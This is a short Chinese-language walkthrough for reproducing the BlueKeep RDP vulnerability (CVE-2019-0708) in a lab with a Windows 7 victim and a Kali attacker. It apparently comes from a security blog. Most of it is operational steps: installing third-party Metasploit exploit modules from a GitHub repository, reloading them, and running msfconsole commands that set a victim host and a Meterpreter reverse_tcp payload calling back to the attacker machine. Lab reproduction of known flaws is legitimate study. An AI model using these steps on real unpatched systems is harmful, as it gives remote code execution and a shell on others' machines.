漏洞环境

  • 192.168.91.136 windows7 6.1.7601

  • 192.168.91.151 kali

    Windows7 SP1下载链接:

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

复现过程

1、首先升级MSF

1
2
apt-get update
apt-get install metasploit-framework

2、导入脚本

然后下载RCE脚本,直接将下载下载的脚本放到对应的目录下

1
2
3
4
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb 
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

下载地址:

https://github.com/NAXG/cve_2019_0708_bluekeep_rce

3、重新加载脚本

1
2
msfconsole 
reload_all

1-14、攻击

使用set RHOSTS 受害机IP设置受害机IP

使用set RPORT 受害机PORT设置受害机RDP端口号

使用set target ID数字(可选为0-4)设置受害机机器架构

lhost一般不用设置,payload一定要设置

1
2
3
4
5
6
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 
set lhost 192.168.91.151
set rhost 192.168.91.136
set payload windows/x64/meterpreter/reverse_tcp
set target 1
run

2

3-1目前这个exp仅适用于 windows7 6.1.7601 windows 2008r2

END